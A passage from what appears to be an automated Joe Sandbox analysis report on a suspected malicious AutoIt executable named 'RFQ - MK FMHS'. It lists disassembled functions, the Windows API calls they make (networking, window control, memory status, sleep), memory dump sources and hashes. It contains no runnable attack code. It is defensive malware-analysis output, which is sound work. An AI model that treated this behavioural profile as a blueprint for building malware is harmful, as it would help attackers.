                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: 96c7a1f2c4d93123a5b09c6bc0ef093a801ce28a060d28dd282c10513dd2741e
                    • Instruction ID: cca3e0d9e271398c9f2f013c4fdbd4f189729166812027341e82e0ac667a93e4
                    • Opcode Fuzzy Hash: 96c7a1f2c4d93123a5b09c6bc0ef093a801ce28a060d28dd282c10513dd2741e
                    • Instruction Fuzzy Hash: B3E0C275800204AFDF019F61C848AAD7BB5AF88350F118429E95AE6220CB388145DF80
                    Function 00EB219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • GetDesktopWindow.USER32 ref: 00EB219B
                    • GetDC.USER32(00000000), ref: 00EB21A5
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EB21B1
                    • ReleaseDC.USER32(?), ref: 00EB21D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: ff9112df8721b5425a2b718dadd9dfc24416e1f66251e8157487e78256d8c9ca
                    • Instruction ID: ce2808d9d70f8783e4ccb0abb7033264b377b5faeb433a9367035784a5d66cdd
                    • Opcode Fuzzy Hash: ff9112df8721b5425a2b718dadd9dfc24416e1f66251e8157487e78256d8c9ca
                    • Instruction Fuzzy Hash: 63E0EEB5800204AFCF019FB2C8486AD7BF5AF8C310F128029F95AE7220CF389145DF80
                    Function 00ECB7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                    Download Yara Rule
                    APIs
                    • OleSetContainedObject.OLE32(?,00000001), ref: 00ECB981
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ContainedObject
                    • String ID: AutoIt3GUI$Container
                    • API String ID: 3565006973-3941886329
                    • Opcode ID: c294a784bc8affa378085ea174f794ed7ecd5ddcb94271e703f19088dfd12d5c
                    • Instruction ID: 1e94a1c234f6fe89456cfb1d47069a8d78deb2ebb3978e98db7afbe75d4a4e42
                    • Opcode Fuzzy Hash: c294a784bc8affa378085ea174f794ed7ecd5ddcb94271e703f19088dfd12d5c
                    • Instruction Fuzzy Hash: 9F915A71600601AFDB24DF28C985F6ABBE8FF48710F14956EF94AEB291DB71E841CB50
                    Function 00EDB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E8FEC6: _wcscpy.LIBCMT ref: 00E8FEE9
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                    • __wcsnicmp.LIBCMT ref: 00EDB298
                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00EDB361
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                    • String ID: LPT
                    • API String ID: 3222508074-1350329615
                    • Opcode ID: f46e34f36184e70963a222ca14a5577bcedac70d2a2a53092d9e7d82b5dce75a
                    • Instruction ID: 3a465a682ce924f0aae2fead25a332bc6df60407a4938054f53c5dfb7688179a
                    • Opcode Fuzzy Hash: f46e34f36184e70963a222ca14a5577bcedac70d2a2a53092d9e7d82b5dce75a
                    • Instruction Fuzzy Hash: 6F615E75A00215EFCB14DB94C881EAEB7F4EF48310F15916AF54ABB391EB70AE41DB50
                    Function 00EB8A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: Oa
                    • API String ID: 4104443479-3945284152
                    • Opcode ID: b933f1dc5721b4631f065087ca5058abef2760ad5f60ea6215085c4097f8e8fb
                    • Instruction ID: cd13455c1ba5d1998a2df710f057b9266b69cbb102215f9f28376e6e0e65c6be
                    • Opcode Fuzzy Hash: b933f1dc5721b4631f065087ca5058abef2760ad5f60ea6215085c4097f8e8fb
                    • Instruction Fuzzy Hash: 5C5150B0900609DFCB64CF68C580AEEB7F5FF44308F14956AE85AE7350EB31A955CB51
                    Function 00E82AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 00E82AC8
                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E82AE1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: GlobalMemorySleepStatus
                    • String ID: @
                    • API String ID: 2783356886-2766056989
                    • Opcode ID: 53679ec3bb38b58cc40ddcd53a09f076142facb2637f636e2bf1700a6a98326a
                    • Instruction ID: 7e9f6451bef91ecded9a0bfb425c6bd3d82aecc688d7d6fe6de95767280c25d5
                    • Opcode Fuzzy Hash: 53679ec3bb38b58cc40ddcd53a09f076142facb2637f636e2bf1700a6a98326a
                    • Instruction Fuzzy Hash: 7C5137714187489BD320AF10D886BAFBBF8FFC5314F42885DF1D9611A6DB309929CB66
                    Function 00ED99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E7506B: __fread_nolock.LIBCMT ref: 00E75089
                    • _wcscmp.LIBCMT ref: 00ED9AAE
                    • _wcscmp.LIBCMT ref: 00ED9AC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _wcscmp$__fread_nolock
                    • String ID: FILE
                    • API String ID: 4029003684-3121273764
                    • Opcode ID: 84398cb278c937ccf4ad75c87c856a4af1e16875cf850a7b03f7c2e9520847cf
                    • Instruction ID: 6474c8aa1021ab8394e145a084bd3872ae129af9638e291acfb153f11e08b0ef
                    • Opcode Fuzzy Hash: 84398cb278c937ccf4ad75c87c856a4af1e16875cf850a7b03f7c2e9520847cf
                    • Instruction Fuzzy Hash: 1341F672A00619BADF209AA0DC85FEFBBFDDF45714F01406BB904B7281DAB19E0587A1
                    Function 00EE2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00EE2892
                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00EE28C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CrackInternet_memset
                    • String ID: |
                    • API String ID: 1413715105-2343686810
                    • Opcode ID: 66a5bd139204a22eae2abd7f69f4c7adc54faee2afd03109d5957d65935db42d
                    • Instruction ID: b6afdc7c3754e9335396d686871fe5bd7a297c526fa98d857aee77a3d827c37f
                    • Opcode Fuzzy Hash: 66a5bd139204a22eae2abd7f69f4c7adc54faee2afd03109d5957d65935db42d
                    • Instruction Fuzzy Hash: 49311871800119AFDF05EFA1CC85EEEBFB9FF08300F105029E959B6166DA325A56DBA0
                    Function 00EF6CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(?,?,?,?), ref: 00EF6D86
                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EF6DC2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$DestroyMove
                    • String ID: static
                    • API String ID: 2139405536-2160076837
                    • Opcode ID: 2f3884e23dc74f3605087a11910b9bbb1d329492c20fb76af078113eea816bd5
                    • Instruction ID: 0c7cc15cb97c4f0a2b7f70309640ed7501b5792257649eed7e82b68544576dba
                    • Opcode Fuzzy Hash: 2f3884e23dc74f3605087a11910b9bbb1d329492c20fb76af078113eea816bd5
                    • Instruction Fuzzy Hash: 65315071210608AFDB109F74CC40AFB77B9FF88764F10A519FA99A7190DB71AC51DB60
                    Function 00ED2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00ED2E00
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00ED2E3B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 46fe59c542dfb61d0858ce834d73b7ca723b0464022d499b784962b18b614366
                    • Instruction ID: f81f62eae11ed4fcdeedce57fdd7146d0ee9601563f74afc63e17708b9f0835a
                    • Opcode Fuzzy Hash: 46fe59c542dfb61d0858ce834d73b7ca723b0464022d499b784962b18b614366
                    • Instruction Fuzzy Hash: DA312731600305ABEB268F58C8447AEBBF5EF15354F14142FEE81F72A1D7709942CB50
                    Function 00EF6943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EF69D0
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF69DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: Combobox
                    • API String ID: 3850602802-2096851135
                    • Opcode ID: 678b2feca76aa4e95a5142433e39e4f148819211b8df88a3aa5dd7343d657a6d
                    • Instruction ID: c3fe5a44111553e85fb7ccd59609183264be7864207b50a9979b09dec2025b1a
                    • Opcode Fuzzy Hash: 678b2feca76aa4e95a5142433e39e4f148819211b8df88a3aa5dd7343d657a6d
                    • Instruction Fuzzy Hash: 4E11B67160020C7FEF119F14CC80EBB37AAEBC93A8F115124FA58AB290D6B1DC5187A0
                    Function 00EF6E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E71D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E71D73
                      • Part of subcall function 00E71D35: GetStockObject.GDI32(00000011), ref: 00E71D87
                      • Part of subcall function 00E71D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E71D91
                    • GetWindowRect.USER32(00000000,?), ref: 00EF6EE0
                    • GetSysColor.USER32(00000012), ref: 00EF6EFA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                    • String ID: static
                    • API String ID: 1983116058-2160076837
                    • Opcode ID: fd12aa6c7783ff9095c7a827131918af55c263b9ee783f9dc433dafe6413003d
                    • Instruction ID: fd2de6a6369f235071cf17418216fec1c374b2507239ac50c3e669a2b3521250
                    • Opcode Fuzzy Hash: fd12aa6c7783ff9095c7a827131918af55c263b9ee783f9dc433dafe6413003d
                    • Instruction Fuzzy Hash: 78212972610209AFDB04DFA8DD45AFA7BB8FB48314F005629FE55E3250E734E861DB50
                    Function 00EF6B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowTextLengthW.USER32(00000000), ref: 00EF6C11
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00EF6C20
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: LengthMessageSendTextWindow
                    • String ID: edit
                    • API String ID: 2978978980-2167791130
                    • Opcode ID: 8f93d55676d8dddae9170baddc2beeea7b99bb23345b3525c3fd95a3a04f0919
                    • Instruction ID: 95fbce8e84aa454fbdb88543650fc3658f5ab21361a62fe7ff98fcefb6a120aa
                    • Opcode Fuzzy Hash: 8f93d55676d8dddae9170baddc2beeea7b99bb23345b3525c3fd95a3a04f0919
                    • Instruction Fuzzy Hash: 24116A7150020CABEB108F64DC45AFA3BAAEF54378F605724FAA5E71E0C775DC91AB60
                    Function 00ED2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00ED2F11
                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00ED2F30
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 3a3b7cab45234a7401965f4a4c35208b374b4082c37554e9436fd9885280a8e5
                    • Instruction ID: eaf9d8e0cf83a94cbb92b4a4c3600371f282064636a68796521fc144b338a521
                    • Opcode Fuzzy Hash: 3a3b7cab45234a7401965f4a4c35208b374b4082c37554e9436fd9885280a8e5
                    • Instruction Fuzzy Hash: 7F11BE31E01118AFCB21DB98DC44BA973BAEB25318F0450AAEE44F73A0D7B0AD069791
                    Function 00EE24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EE2520
                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EE2549
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Internet$OpenOption
                    • String ID: <local>
                    • API String ID: 942729171-4266983199
                    • Opcode ID: f6fef275da535160833f346fc8be4a2eca0b26046cf273305082f704777517db
                    • Instruction ID: 566e9e8ecb35d84c02a7563ac01709dab19266d304667bd88a25130ea220a206
                    • Opcode Fuzzy Hash: f6fef275da535160833f346fc8be4a2eca0b26046cf273305082f704777517db
                    • Instruction Fuzzy Hash: 5311E370501669BEDB248F538C94EFBFF6CFF05355F10912EF60566040D2705948DAE1
                    Function 00EE80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EE830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00EE80C8,?,00000000,?,?), ref: 00EE8322
                    • inet_addr.WSOCK32(00000000), ref: 00EE80CB
                    • htons.WSOCK32(00000000), ref: 00EE8108
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ByteCharMultiWidehtonsinet_addr
                    • String ID: 255.255.255.255
                    • API String ID: 2496851823-2422070025
                    • Opcode ID: 440eec9577253bc7a9d13255b2d429ea0d398f0150d4d84f7ff85875939093cf
                    • Instruction ID: 0f25d439ca8f236bdcb1a6a67f35ce6691bd4815d92d9a0fde81af243d91fdb2
                    • Opcode Fuzzy Hash: 440eec9577253bc7a9d13255b2d429ea0d398f0150d4d84f7ff85875939093cf
                    • Instruction Fuzzy Hash: BD112130200249ABDB20AF65CD92FFEB364FF00320F10952BE919B72C2CA72A805C691
                    Function 00EC92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7
                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00EC9355
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: efc7a50bf31d676eeecb1b331107f2fe95a7c9456537b17f23f4ea0b3aaef77d
                    • Instruction ID: eda28815d3c456c2c631137ca55938997f5b324440f5fe31abfd5df1856bb11b
                    • Opcode Fuzzy Hash: efc7a50bf31d676eeecb1b331107f2fe95a7c9456537b17f23f4ea0b3aaef77d
                    • Instruction Fuzzy Hash: 6E014131A04214ABCB08EBA4CC82DFE73A8FF02320B142A1DF836772C2DB32580CC251
                    Function 00EC91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7
                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00EC924D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 9aad6fb609b4529043c5206580fc6072b81418aec040dc691c63ad92315084ef
                    • Instruction ID: d2a78b9b060069c48d6eb57594ed2b0beebb4542c3ab4a9925ad02cbaa3f6e53
